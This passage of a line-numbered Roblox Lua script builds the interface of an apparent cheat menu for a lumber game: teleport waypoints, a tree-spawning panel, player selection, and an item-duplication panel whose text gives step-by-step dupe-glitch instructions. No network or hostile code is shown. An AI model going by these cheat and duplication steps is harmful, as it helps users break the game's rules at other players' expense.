  1233. BobsShack.Size = UDim2.new(0, 147, 0, 20)
  1234. BobsShack.Font = Enum.Font.Fantasy
  1235. BobsShack.FontSize = Enum.FontSize.Size14
  1236. BobsShack.Text = "Bob's Shack"
  1237. BobsShack.TextSize = 16
  1238.  
  1239. Swamp.Name = "Swamp"
  1240. Swamp.Parent = WaypointList
  1241. Swamp.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1242. Swamp.TextColor3 = Color3.new(1, 1, 1)
  1243. Swamp.BorderColor3 = Color3.new(0, 1, 0)
  1244. Swamp.Position = UDim2.new(0, 5, 0, 300)
  1245. Swamp.Size = UDim2.new(0, 147, 0, 20)
  1246. Swamp.Font = Enum.Font.Fantasy
  1247. Swamp.FontSize = Enum.FontSize.Size14
  1248. Swamp.Text = "Swamp"
  1249. Swamp.TextSize = 16
  1250.  
  1251. PalmIsland.Name = "PalmIsland"
  1252. PalmIsland.Parent = WaypointList
  1253. PalmIsland.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1254. PalmIsland.TextColor3 = Color3.new(1, 1, 1)
  1255. PalmIsland.BorderColor3 = Color3.new(0, 1, 0)
  1256. PalmIsland.Position = UDim2.new(0, 5, 0, 325)
  1257. PalmIsland.Size = UDim2.new(0, 147, 0, 20)
  1258. PalmIsland.Font = Enum.Font.Fantasy
  1259. PalmIsland.FontSize = Enum.FontSize.Size14
  1260. PalmIsland.Text = "Palm Island"
  1261. PalmIsland.TextSize = 16
  1262.  
  1263. Cave.Name = "Cave"
  1264. Cave.Parent = WaypointList
  1265. Cave.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1266. Cave.TextColor3 = Color3.new(1, 1, 1)
  1267. Cave.BorderColor3 = Color3.new(0, 1, 0)
  1268. Cave.Position = UDim2.new(0, 5, 0, 350)
  1269. Cave.Size = UDim2.new(0, 147, 0, 20)
  1270. Cave.Font = Enum.Font.Fantasy
  1271. Cave.FontSize = Enum.FontSize.Size14
  1272. Cave.Text = "Cave"
  1273. Cave.TextSize = 16
  1274.  
  1275. Volcano.Name = "Volcano"
  1276. Volcano.Parent = WaypointList
  1277. Volcano.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1278. Volcano.TextColor3 = Color3.new(1, 1, 1)
  1279. Volcano.BorderColor3 = Color3.new(0, 1, 0)
  1280. Volcano.Position = UDim2.new(0, 5, 0, 375)
  1281. Volcano.Size = UDim2.new(0, 147, 0, 20)
  1282. Volcano.Font = Enum.Font.Fantasy
  1283. Volcano.FontSize = Enum.FontSize.Size14
  1284. Volcano.Text = "Volcano"
  1285. Volcano.TextSize = 16
  1286.  
  1287. Dock.Name = "Dock"
  1288. Dock.Parent = WaypointList
  1289. Dock.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1290. Dock.TextColor3 = Color3.new(1, 1, 1)
  1291. Dock.BorderColor3 = Color3.new(0, 1, 0)
  1292. Dock.Position = UDim2.new(0, 5, 0, 400)
  1293. Dock.Size = UDim2.new(0, 147, 0, 20)
  1294. Dock.Font = Enum.Font.Fantasy
  1295. Dock.FontSize = Enum.FontSize.Size14
  1296. Dock.Text = "Dock"
  1297. Dock.TextSize = 16
  1298.  
  1299. Bridge.Name = "Bridge"
  1300. Bridge.Parent = WaypointList
  1301. Bridge.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1302. Bridge.TextColor3 = Color3.new(1, 1, 1)
  1303. Bridge.BorderColor3 = Color3.new(0, 1, 0)
  1304. Bridge.Position = UDim2.new(0, 5, 0, 425)
  1305. Bridge.Size = UDim2.new(0, 147, 0, 20)
  1306. Bridge.Font = Enum.Font.Fantasy
  1307. Bridge.FontSize = Enum.FontSize.Size14
  1308. Bridge.Text = "Bridge"
  1309. Bridge.TextSize = 16
  1310.  
  1311. EndTimes.Name = "EndTimes"
  1312. EndTimes.Parent = WaypointList
  1313. EndTimes.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1314. EndTimes.TextColor3 = Color3.new(1, 1, 1)
  1315. EndTimes.BorderColor3 = Color3.new(0, 1, 0)
  1316. EndTimes.Position = UDim2.new(0, 5, 0, 450)
  1317. EndTimes.Size = UDim2.new(0, 147, 0, 20)
  1318. EndTimes.Font = Enum.Font.Fantasy
  1319. EndTimes.FontSize = Enum.FontSize.Size14
  1320. EndTimes.Text = "End Times"
  1321. EndTimes.TextSize = 16
  1322.  
  1323. ShrineOfSight.Name = "ShrineOfSight"
  1324. ShrineOfSight.Parent = WaypointList
  1325. ShrineOfSight.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1326. ShrineOfSight.TextColor3 = Color3.new(1, 1, 1)
  1327. ShrineOfSight.BorderColor3 = Color3.new(0, 1, 0)
  1328. ShrineOfSight.Position = UDim2.new(0, 5, 0, 475)
  1329. ShrineOfSight.Size = UDim2.new(0, 147, 0, 20)
  1330. ShrineOfSight.Font = Enum.Font.Fantasy
  1331. ShrineOfSight.FontSize = Enum.FontSize.Size14
  1332. ShrineOfSight.Text = "Shrine Of Sight"
  1333. ShrineOfSight.TextSize = 16
  1334.  
  1335. TheDen.Name = "TheDen"
  1336. TheDen.Parent = WaypointList
  1337. TheDen.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1338. TheDen.TextColor3 = Color3.new(1, 1, 1)
  1339. TheDen.BorderColor3 = Color3.new(0, 1, 0)
  1340. TheDen.Position = UDim2.new(0, 5, 0, 500)
  1341. TheDen.Size = UDim2.new(0, 147, 0, 20)
  1342. TheDen.Font = Enum.Font.Fantasy
  1343. TheDen.FontSize = Enum.FontSize.Size14
  1344. TheDen.Text = "The Den"
  1345. TheDen.TextSize = 16
  1346.  
  1347. VolcanoWin.Name = "VolcanoWin"
  1348. VolcanoWin.Parent = WaypointList
  1349. VolcanoWin.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1350. VolcanoWin.TextColor3 = Color3.new(1, 1, 1)
  1351. VolcanoWin.BorderColor3 = Color3.new(0, 1, 0)
  1352. VolcanoWin.Position = UDim2.new(0, 5, 0, 525)
  1353. VolcanoWin.Size = UDim2.new(0, 147, 0, 20)
  1354. VolcanoWin.Font = Enum.Font.Fantasy
  1355. VolcanoWin.FontSize = Enum.FontSize.Size14
  1356. VolcanoWin.Text = "Volcano Win"
  1357. VolcanoWin.TextSize = 16
  1358.  
  1359. SkiLodge.Name = "SkiLodge"
  1360. SkiLodge.Parent = WaypointList
  1361. SkiLodge.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1362. SkiLodge.TextColor3 = Color3.new(1, 1, 1)
  1363. SkiLodge.BorderColor3 = Color3.new(0, 1, 0)
  1364. SkiLodge.Position = UDim2.new(0, 5, 0, 550)
  1365. SkiLodge.Size = UDim2.new(0, 147, 0, 20)
  1366. SkiLodge.Font = Enum.Font.Fantasy
  1367. SkiLodge.FontSize = Enum.FontSize.Size14
  1368. SkiLodge.Text = "Ski Lodge"
  1369. SkiLodge.TextSize = 16
  1370.  
  1371. StrangeMan.Name = "StrangeMan"
  1372. StrangeMan.Parent = WaypointList
  1373. StrangeMan.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1374. StrangeMan.TextColor3 = Color3.new(1, 1, 1)
  1375. StrangeMan.BorderColor3 = Color3.new(0, 1, 0)
  1376. StrangeMan.Position = UDim2.new(0, 5, 0, 575)
  1377. StrangeMan.Size = UDim2.new(0, 147, 0, 20)
  1378. StrangeMan.Font = Enum.Font.Fantasy
  1379. StrangeMan.FontSize = Enum.FontSize.Size14
  1380. StrangeMan.Text = "The Strange Man"
  1381. StrangeMan.TextSize = 16
  1382.  
  1383. BringTreeFrame.Name = "BringTreeFrame"
  1384. BringTreeFrame.Parent = MenuFrame
  1385. BringTreeFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  1386. BringTreeFrame.BackgroundTransparency = 0
  1387. BringTreeFrame.BorderColor3 = Color3.new(0, 1, 0)
  1388. BringTreeFrame.Size = UDim2.new(0, 170, 0, 290)
  1389. BringTreeFrame.Visible = false
  1390.  
  1391. BringTreeHeader.Name = "BringTreeHeader"
  1392. BringTreeHeader.Parent = BringTreeFrame
  1393. BringTreeHeader.BackgroundColor3 = Color3.new(1, 1, 1)
  1394. BringTreeHeader.BackgroundTransparency = 0.15
  1395. BringTreeHeader.BorderColor3 = Color3.new(0, 1, 0)
  1396. BringTreeHeader.Position = UDim2.new(0, 0, 0, 0)
  1397. BringTreeHeader.Size = UDim2.new(0, 170, 0, 35)
  1398. BringTreeHeader.Font = Enum.Font.Fantasy
  1399. BringTreeHeader.FontSize = Enum.FontSize.Size18
  1400. BringTreeHeader.Text = "SELECT A TREE TO SPAWN"
  1401. BringTreeHeader.TextColor3 = Color3.new(0, 0, 0)
  1402. BringTreeHeader.TextScaled = true
  1403. BringTreeHeader.TextSize = 17
  1404. BringTreeHeader.TextWrapped = true
  1405.  
  1406. BringTreeInfo1.Name = "BringTreeInfo1"
  1407. BringTreeInfo1.Parent = BringTreeFrame
  1408. BringTreeInfo1.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1409. BringTreeInfo1.BorderColor3 = Color3.new(0, 1, 0)
  1410. BringTreeInfo1.Position = UDim2.new(0, 30, 0, 255)
  1411. BringTreeInfo1.Size = UDim2.new(0, 110, 0, 25)
  1412. BringTreeInfo1.Font = Enum.Font.SourceSans
  1413. BringTreeInfo1.FontSize = Enum.FontSize.Size18
  1414. BringTreeInfo1.TextColor3 = Color3.new(1, 1, 1)
  1415. BringTreeInfo1.Text = "Info"
  1416. BringTreeInfo1.TextScaled = true
  1417. BringTreeInfo1.TextSize = 18
  1418.  
  1419. BringTreeInfo2.Name = "BringTreeInfo2"
  1420. BringTreeInfo2.Parent = BringTreeFrame
  1421. BringTreeInfo2.BackgroundColor3 = Color3.new(0, 0, 0)
  1422. BringTreeInfo2.BorderColor3 = Color3.new(0, 1, 0)
  1423. BringTreeInfo2.Position = UDim2.new(0, 185, 1, -260)
  1424. BringTreeInfo2.Size = UDim2.new(0, 170, 0, 300)
  1425. BringTreeInfo2.Visible = false
  1426. BringTreeInfo2.Font = Enum.Font.Fantasy
  1427. BringTreeInfo2.FontSize = Enum.FontSize.Size18
  1428. BringTreeInfo2.Text = "1. Click on a tree name to spawn it.\n2. Use an axe to chop it until the tree vanishes.\n3. Click on 'TP Wood to you' to bring the wood back or click 'Sell Wood' to send the wood to the Wood DropOff and sell it automatically for money.\n\nSome trees don't work so just try them and see if you get lucky."
  1429. BringTreeInfo2.TextColor3 = Color3.new(1, 1, 1)
  1430. BringTreeInfo2.TextSize = 16
  1431. BringTreeInfo2.Active = true
  1432. BringTreeInfo2.Draggable = true
  1433. BringTreeInfo2.ZIndex = 7
  1434. BringTreeInfo2.TextWrapped = true
  1435. BringTreeInfo2.TextYAlignment = Enum.TextYAlignment.Top
  1436.  
  1437. OakTree.Name = "OakTree"
  1438. OakTree.Parent = BringTreeFrame
  1439. OakTree.BackgroundColor3 = Color3.new(0.95256, 0.70952, 0.60368)
  1440. OakTree.BackgroundTransparency = 0.15
  1441. OakTree.BorderColor3 = Color3.new(0, 1, 0)
  1442. OakTree.Position = UDim2.new(0, 5, 0, 45)
  1443. OakTree.Size = UDim2.new(0, 37, 0, 35)
  1444. OakTree.Font = Enum.Font.Fantasy
  1445. OakTree.FontSize = Enum.FontSize.Size18
  1446. OakTree.Text = "OAK\nTREE"
  1447. OakTree.TextColor3 = Color3.new(0, 0, 0)
  1448. OakTree.TextWrapped = true
  1449. OakTree.TextSize = 14
  1450.  
  1451. ElmTree.Name = "ElmTree"
  1452. ElmTree.Parent = BringTreeFrame
  1453. ElmTree.BackgroundColor3 = Color3.new(1, 0.95648, 0.88984)
  1454. ElmTree.BackgroundTransparency = 0.15
  1455. ElmTree.BorderColor3 = Color3.new(0, 1, 0)
  1456. ElmTree.Position = UDim2.new(0, 47, 0, 45)
  1457. ElmTree.Size = UDim2.new(0, 37, 0, 35)
  1458. ElmTree.Font = Enum.Font.Fantasy
  1459. ElmTree.FontSize = Enum.FontSize.Size18
  1460. ElmTree.Text = "ELM\nTREE"
  1461. ElmTree.TextColor3 = Color3.new(0, 0, 0)
  1462. ElmTree.TextWrapped = true
  1463. ElmTree.TextSize = 14
  1464.  
  1465. EndTimesTree.Name = "EndTimesTree"
  1466. EndTimesTree.Parent = BringTreeFrame
  1467. EndTimesTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1468. EndTimesTree.BackgroundTransparency = 0.15
  1469. EndTimesTree.BorderColor3 = Color3.new(0, 1, 0)
  1470. EndTimesTree.Position = UDim2.new(0, 89, 0, 45)
  1471. EndTimesTree.Size = UDim2.new(0, 76, 0, 35)
  1472. EndTimesTree.Font = Enum.Font.Fantasy
  1473. EndTimesTree.FontSize = Enum.FontSize.Size18
  1474. EndTimesTree.Text = "ENDTIMES\nTREE"
  1475. EndTimesTree.TextColor3 = Color3.new(0, 0, 0)
  1476. EndTimesTree.TextWrapped = true
  1477. EndTimesTree.TextSize = 14
  1478.  
  1479. BirchTree.Name = "BirchTree"
  1480. BirchTree.Parent = BringTreeFrame
  1481. BirchTree.BackgroundColor3 = Color3.new(0.9604, 0.9604, 0.9604)
  1482. BirchTree.BackgroundTransparency = 0.15
  1483. BirchTree.BorderColor3 = Color3.new(0, 1, 0)
  1484. BirchTree.Position = UDim2.new(0, 5, 0, 85)
  1485. BirchTree.Size = UDim2.new(0, 45, 0, 35)
  1486. BirchTree.Font = Enum.Font.Fantasy
  1487. BirchTree.FontSize = Enum.FontSize.Size18
  1488. BirchTree.Text = "BIRCH\nTREE"
  1489. BirchTree.TextColor3 = Color3.new(0, 0, 0)
  1490. BirchTree.TextWrapped = true
  1491. BirchTree.TextSize = 14
  1492.  
  1493. VolcanoTree.Name = "VolcanoTree"
  1494. VolcanoTree.Parent = BringTreeFrame
  1495. VolcanoTree.BackgroundColor3 = Color3.new(1, 0, 0)
  1496. VolcanoTree.BackgroundTransparency = 0.15
  1497. VolcanoTree.BorderColor3 = Color3.new(0, 1, 0)
  1498. VolcanoTree.Position = UDim2.new(0, 55, 0, 85)
  1499. VolcanoTree.Size = UDim2.new(0, 65, 0, 35)
  1500. VolcanoTree.Font = Enum.Font.Fantasy
  1501. VolcanoTree.FontSize = Enum.FontSize.Size18
  1502. VolcanoTree.Text = "VOLCANO\nTREE"
  1503. VolcanoTree.TextColor3 = Color3.new(0, 0, 0)
  1504. VolcanoTree.TextWrapped = true
  1505. VolcanoTree.TextSize = 14
  1506.  
  1507. FirTree.Name = "FirTree"
  1508. FirTree.Parent = BringTreeFrame
  1509. FirTree.BackgroundColor3 = Color3.new(1, 0.96824, 0.9212)
  1510. FirTree.BackgroundTransparency = 0.15
  1511. FirTree.BorderColor3 = Color3.new(0, 1, 0)
  1512. FirTree.Position = UDim2.new(0, 125, 0, 85)
  1513. FirTree.Size = UDim2.new(0, 40, 0, 35)
  1514. FirTree.Font = Enum.Font.Fantasy
  1515. FirTree.FontSize = Enum.FontSize.Size18
  1516. FirTree.Text = "FIR\nTREE"
  1517. FirTree.TextColor3 = Color3.new(0, 0, 0)
  1518. FirTree.TextWrapped = true
  1519. FirTree.TextSize = 14
  1520.  
  1521. SpookyTree.Name = "SpookyTree"
  1522. SpookyTree.Parent = BringTreeFrame
  1523. SpookyTree.BackgroundColor3 = Color3.new(0.35672, 0.062736, 0.003921)
  1524. SpookyTree.BackgroundTransparency = 0.15
  1525. SpookyTree.BorderColor3 = Color3.new(0, 1, 0)
  1526. SpookyTree.Position = UDim2.new(0, 5, 0, 125)
  1527. SpookyTree.Size = UDim2.new(0, 60, 0, 35)
  1528. SpookyTree.Font = Enum.Font.Fantasy
  1529. SpookyTree.FontSize = Enum.FontSize.Size18
  1530. SpookyTree.Text = "SPOOKY\nTREE"
  1531. SpookyTree.TextColor3 = Color3.new(1, 1, 1)
  1532. SpookyTree.TextWrapped = true
  1533. SpookyTree.TextSize = 14
  1534.  
  1535. KoaTree.Name = "KoaTree"
  1536. KoaTree.Parent = BringTreeFrame
  1537. KoaTree.BackgroundColor3 = Color3.new(0.72912, 0.125472, 0.003921)
  1538. KoaTree.BackgroundTransparency = 0.15
  1539. KoaTree.BorderColor3 = Color3.new(0, 1, 0)
  1540. KoaTree.Position = UDim2.new(0, 70, 0, 125)
  1541. KoaTree.Size = UDim2.new(0, 45, 0, 35)
  1542. KoaTree.Font = Enum.Font.Fantasy
  1543. KoaTree.FontSize = Enum.FontSize.Size18
  1544. KoaTree.Text = "KOA\nTREE"
  1545. KoaTree.TextColor3 = Color3.new(1, 1, 1)
  1546. KoaTree.TextWrapped = true
  1547. KoaTree.TextSize = 14
  1548.  
  1549. PalmTree.Name = "PalmTree"
  1550. PalmTree.Parent = BringTreeFrame
  1551. PalmTree.BackgroundColor3 = Color3.new(1, 0.96824, 0.9212)
  1552. PalmTree.BackgroundTransparency = 0.15
  1553. PalmTree.BorderColor3 = Color3.new(0, 1, 0)
  1554. PalmTree.Position = UDim2.new(0, 120, 0, 125)
  1555. PalmTree.Size = UDim2.new(0, 45, 0, 35)
  1556. PalmTree.Font = Enum.Font.Fantasy
  1557. PalmTree.FontSize = Enum.FontSize.Size18
  1558. PalmTree.Text = "PALM\nTREE"
  1559. PalmTree.TextColor3 = Color3.new(0, 0, 0)
  1560. PalmTree.TextWrapped = true
  1561. PalmTree.TextSize = 14
  1562.  
  1563. GreenTree.Name = "GreenTree"
  1564. GreenTree.Parent = BringTreeFrame
  1565. GreenTree.BackgroundColor3 = Color3.new(0, 1, 0)
  1566. GreenTree.BackgroundTransparency = 0.15
  1567. GreenTree.BorderColor3 = Color3.new(0, 1, 0)
  1568. GreenTree.Position = UDim2.new(0, 5, 0, 165)
  1569. GreenTree.Size = UDim2.new(0, 51, 0, 35)
  1570. GreenTree.Font = Enum.Font.Fantasy
  1571. GreenTree.FontSize = Enum.FontSize.Size18
  1572. GreenTree.Text = "GREEN\nTREE"
  1573. GreenTree.TextColor3 = Color3.new(0, 0, 0)
  1574. GreenTree.TextWrapped = true
  1575. GreenTree.TextSize = 14
  1576.  
  1577. GoldTree.Name = "GoldTree"
  1578. GoldTree.Parent = BringTreeFrame
  1579. GoldTree.BackgroundColor3 = Color3.new(0.960645, 0.86262, 0.231339)
  1580. GoldTree.BackgroundTransparency = 0.15
  1581. GoldTree.BorderColor3 = Color3.new(0, 1, 0)
  1582. GoldTree.Position = UDim2.new(0, 61, 0, 165)
  1583. GoldTree.Size = UDim2.new(0, 44, 0, 35)
  1584. GoldTree.Font = Enum.Font.Fantasy
  1585. GoldTree.FontSize = Enum.FontSize.Size18
  1586. GoldTree.Text = "GOLD\nTREE"
  1587. GoldTree.TextColor3 = Color3.new(0, 0, 0)
  1588. GoldTree.TextWrapped = true
  1589. GoldTree.TextSize = 14
  1590.  
  1591. CherryTree.Name = "CherryTree"
  1592. CherryTree.Parent = BringTreeFrame
  1593. CherryTree.BackgroundColor3 = Color3.new(0.93296, 0.39984, 0.49)
  1594. CherryTree.BackgroundTransparency = 0.15
  1595. CherryTree.BorderColor3 = Color3.new(0, 1, 0)
  1596. CherryTree.Position = UDim2.new(0, 110, 0, 165)
  1597. CherryTree.Size = UDim2.new(0, 55, 0, 35)
  1598. CherryTree.Font = Enum.Font.Fantasy
  1599. CherryTree.FontSize = Enum.FontSize.Size18
  1600. CherryTree.Text = "CHERRY TREE"
  1601. CherryTree.TextColor3 = Color3.new(0, 0, 0)
  1602. CherryTree.TextWrapped = true
  1603. CherryTree.TextSize = 14
  1604.  
  1605. CaveCrawlerTree.Name = "CaveCrawlerTree"
  1606. CaveCrawlerTree.Parent = BringTreeFrame
  1607. CaveCrawlerTree.BackgroundColor3 = Color3.new(0, 0, 1)
  1608. CaveCrawlerTree.BackgroundTransparency = 0.15
  1609. CaveCrawlerTree.BorderColor3 = Color3.new(0, 1, 0)
  1610. CaveCrawlerTree.Position = UDim2.new(0, 5, 0, 205)
  1611. CaveCrawlerTree.Size = UDim2.new(0, 95, 0, 35)
  1612. CaveCrawlerTree.Font = Enum.Font.Fantasy
  1613. CaveCrawlerTree.FontSize = Enum.FontSize.Size18
  1614. CaveCrawlerTree.Text = "CAVECRAWLER\nTREE"
  1615. CaveCrawlerTree.TextColor3 = Color3.new(1, 1, 1)
  1616. CaveCrawlerTree.TextWrapped = true
  1617. CaveCrawlerTree.TextSize = 14
  1618.  
  1619. WalnutTree.Name = "WalnutTree"
  1620. WalnutTree.Parent = BringTreeFrame
  1621. WalnutTree.BackgroundColor3 = Color3.new(0.360732, 0.176445, 0.137235)
  1622. WalnutTree.BackgroundTransparency = 0.15
  1623. WalnutTree.BorderColor3 = Color3.new(0, 1, 0)
  1624. WalnutTree.Position = UDim2.new(0, 105, 0, 205)
  1625. WalnutTree.Size = UDim2.new(0, 60, 0, 35)
  1626. WalnutTree.Font = Enum.Font.Fantasy
  1627. WalnutTree.FontSize = Enum.FontSize.Size18
  1628. WalnutTree.Text = "WALNUT\nTREE"
  1629. WalnutTree.TextColor3 = Color3.new(1, 1, 1)
  1630. WalnutTree.TextWrapped = true
  1631. WalnutTree.TextSize = 14
  1632.  
  1633. DupeFrame.Name = "DupeFrame"
  1634. DupeFrame.Parent = MenuFrame
  1635. DupeFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  1636. DupeFrame.BackgroundTransparency = 0
  1637. DupeFrame.BorderColor3 = Color3.new(0, 1, 0)
  1638. DupeFrame.Size = UDim2.new(0, 170, 0, 290)
  1639. DupeFrame.Visible = false
  1640.  
  1641. Info.Name = "Info"
  1642. Info.Parent = DupeFrame
  1643. Info.BackgroundColor3 = Color3.new(0, 0, 0)
  1644. Info.BorderColor3 = Color3.new(0, 1, 0)
  1645. Info.Position = UDim2.new(0, 185, 1, -370)
  1646. Info.Size = UDim2.new(0, 170, 0, 410)
  1647. Info.Visible = false
  1648. Info.Font = Enum.Font.Fantasy
  1649. Info.FontSize = Enum.FontSize.Size14
  1650. Info.Text = "1. Make sure no Save Slot is loaded in (or unload it).\n2. Click the 'Dupe' button.\n3. The button will turn green.\n4. Load the Save Slot you want to dupe from.\n5. After it's loaded check the Slot does not say 'Current'.\n6. Whitelist the person you want to move [dupe] your items to and make sure they aren't blacklisted\n7. Move the items you want to dupe to your friends base.\n8. Once you are done, reload your Save Slot that you just moved your items from.\n9. Once your Save Slot has reloaded, your base and every thing will be where it was before you duped.\n10. When you are done duping, reload your Slot one more time so you don't lose the items off of your base.\n11. You can disable this by unloading your Save Slot and pressing the Dupe button, it will turn grey."
  1651. Info.TextColor3 = Color3.new(1, 1, 1)
  1652. Info.TextSize = 14
  1653. Info.Active = true
  1654. Info.Draggable = true
  1655. Info.ZIndex = 7
  1656. Info.TextWrapped = true
  1657. Info.TextYAlignment = Enum.TextYAlignment.Top
  1658.  
  1659. Read.Name = "Read"
  1660. Read.Parent = DupeFrame
  1661. Read.BackgroundColor3 = Color3.new(1, 1, 1)
  1662. Read.BackgroundTransparency = 0.15
  1663. Read.BorderColor3 = Color3.new(0, 1, 0)
  1664. Read.Size = UDim2.new(0, 170, 0, 35)
  1665. Read.Font = Enum.Font.Fantasy
  1666. Read.FontSize = Enum.FontSize.Size18
  1667. Read.Text = "READ INFO BEFORE USING THIS"
  1668. Read.TextColor3 = Color3.new(0, 0, 0)
  1669. Read.TextScaled = true
  1670. Read.TextSize = 17
  1671. Read.TextWrapped = true
  1672.  
  1673. Dupe.Name = "Dupe"
  1674. Dupe.Parent = DupeFrame
  1675. Dupe.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1676. Dupe.BorderColor3 = Color3.new(0, 1, 0)
  1677. Dupe.Position = UDim2.new(0, 50, 0, 65)
  1678. Dupe.Size = UDim2.new(0, 70, 0, 25)
  1679. Dupe.Font = Enum.Font.Fantasy
  1680. Dupe.FontSize = Enum.FontSize.Size18
  1681. Dupe.Text = "Dupe"
  1682. Dupe.TextScaled = true
  1683. Dupe.TextColor3 = Color3.new(1, 1, 1)
  1684. Dupe.TextSize = 17
  1685.  
  1686. DupingText1.Name = "DupingText1"
  1687. DupingText1.Parent = DupeFrame
  1688. DupingText1.BackgroundColor3 = Color3.new(0, 0, 0)
  1689. DupingText1.BackgroundTransparency = 1
  1690. DupingText1.Position = UDim2.new(0, 5, 0, 100)
  1691. DupingText1.Size = UDim2.new(0, 160, 0, 140)
  1692. DupingText1.Font = Enum.Font.Fantasy
  1693. DupingText1.FontSize = Enum.FontSize.Size14
  1694. DupingText1.Text = "Loaded Slot Will Save"
  1695. DupingText1.TextColor3 = Color3.new(0, 1, 0)
  1696. DupingText1.TextSize = 14
  1697. DupingText1.TextYAlignment = Enum.TextYAlignment.Top
  1698. DupingText1.TextWrapped = true
  1699.  
  1700. MoreInfo.Name = "MoreInfo"
  1701. MoreInfo.Parent = DupeFrame
  1702. MoreInfo.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1703. MoreInfo.BorderColor3 = Color3.new(0, 1, 0)
  1704. MoreInfo.Position = UDim2.new(0, 25, 0, 240)
  1705. MoreInfo.Size = UDim2.new(0, 120, 0, 25)
  1706. MoreInfo.Font = Enum.Font.SourceSans
  1707. MoreInfo.FontSize = Enum.FontSize.Size18
  1708. MoreInfo.Text = "Info"
  1709. MoreInfo.TextScaled = true
  1710. MoreInfo.TextColor3 = Color3.new(1, 1, 1)
  1711. MoreInfo.TextSize = 18
  1712.  
  1713. PlayerFrame.Name = "PlayerFrame"
  1714. PlayerFrame.Parent = MenuFrame
  1715. PlayerFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  1716. PlayerFrame.BackgroundTransparency = 0
  1717. PlayerFrame.BorderColor3 = Color3.new(0, 1, 0)
  1718. PlayerFrame.Size = UDim2.new(0, 170, 0, 290)
  1719. PlayerFrame.Visible = false
  1720.  
  1721. PlyrSel.Name = "PlyrSel"
  1722. PlyrSel.Parent = PlayerFrame
  1723. PlyrSel.BackgroundColor3 = Color3.new(1, 1, 1)
  1724. PlyrSel.BackgroundTransparency = 0.15
  1725. PlyrSel.BorderColor3 = Color3.new(0, 1, 0)
  1726. PlyrSel.Position = UDim2.new(0, 5, 0, 5)
  1727. PlyrSel.Size = UDim2.new(0, 160, 0, 20)
  1728. PlyrSel.Font = Enum.Font.SourceSans
  1729. PlyrSel.FontSize = Enum.FontSize.Size18
  1730. PlyrSel.Text = "SELECT A PLAYER"
  1731. PlyrSel.TextColor3 = Color3.new(0, 0, 0)
  1732. PlyrSel.TextScaled = true
  1733. PlyrSel.TextSize = 17
  1734. PlyrSel.TextWrapped = true
  1735.  
  1736. Player1.Name = "Player1"
  1737. Player1.Parent = PlayerFrame
  1738. Player1.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1739. Player1.BorderColor3 = Color3.new(0, 1, 0)
  1740. Player1.Position = UDim2.new(0, 5, 0, 40)
  1741. Player1.Size = UDim2.new(0, 160, 0, 20)
  1742. Player1.Font = Enum.Font.Fantasy
  1743. Player1.FontSize = Enum.FontSize.Size18
  1744. Player1.Text = ""
  1745. Player1.TextColor3 = Color3.new(1, 1, 1)
  1746. Player1.TextSize = 16
  1747. Player1.TextWrapped = true
  1748.  
  1749. Player2.Name = "Player2"
  1750. Player2.Parent = PlayerFrame
  1751. Player2.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1752. Player2.BorderColor3 = Color3.new(0, 1, 0)
  1753. Player2.Position = UDim2.new(0, 5, 0, 65)
  1754. Player2.Size = UDim2.new(0, 160, 0, 20)
  1755. Player2.Font = Enum.Font.Fantasy
  1756. Player2.FontSize = Enum.FontSize.Size18
  1757. Player2.Text = ""
  1758. Player2.TextColor3 = Color3.new(1, 1, 1)
  1759. Player2.TextSize = 16
  1760. Player2.TextWrapped = true
  1761.  
  1762. Player3.Name = "Player3"
  1763. Player3.Parent = PlayerFrame
  1764. Player3.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1765. Player3.BorderColor3 = Color3.new(0, 1, 0)
  1766. Player3.Position = UDim2.new(0, 5, 0, 90)
  1767. Player3.Size = UDim2.new(0, 160, 0, 20)
  1768. Player3.Font = Enum.Font.Fantasy
  1769. Player3.FontSize = Enum.FontSize.Size18
  1770. Player3.Text = ""
  1771. Player3.TextColor3 = Color3.new(1, 1, 1)
  1772. Player3.TextSize = 16
  1773. Player3.TextWrapped = true
  1774.  
  1775. Player4.Name = "Player4"
  1776. Player4.Parent = PlayerFrame
  1777. Player4.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1778. Player4.BorderColor3 = Color3.new(0, 1, 0)
  1779. Player4.Position = UDim2.new(0, 5, 0, 115)
  1780. Player4.Size = UDim2.new(0, 160, 0, 20)
  1781. Player4.Font = Enum.Font.Fantasy
  1782. Player4.FontSize = Enum.FontSize.Size18
  1783. Player4.Text = ""
  1784. Player4.TextColor3 = Color3.new(1, 1, 1)
  1785. Player4.TextSize = 16
  1786. Player4.TextWrapped = true
  1787.  
  1788. Player5.Name = "Player5"
  1789. Player5.Parent = PlayerFrame
  1790. Player5.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1791. Player5.BorderColor3 = Color3.new(0, 1, 0)
  1792. Player5.Position = UDim2.new(0, 5, 0, 140)
  1793. Player5.Size = UDim2.new(0, 160, 0, 20)
  1794. Player5.Font = Enum.Font.Fantasy
  1795. Player5.FontSize = Enum.FontSize.Size18
  1796. Player5.Text = ""
  1797. Player5.TextColor3 = Color3.new(1, 1, 1)
  1798. Player5.TextSize = 16
  1799. Player5.TextWrapped = true
  1800.  
  1801. Player6.Name = "Player6"
  1802. Player6.Parent = PlayerFrame
  1803. Player6.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
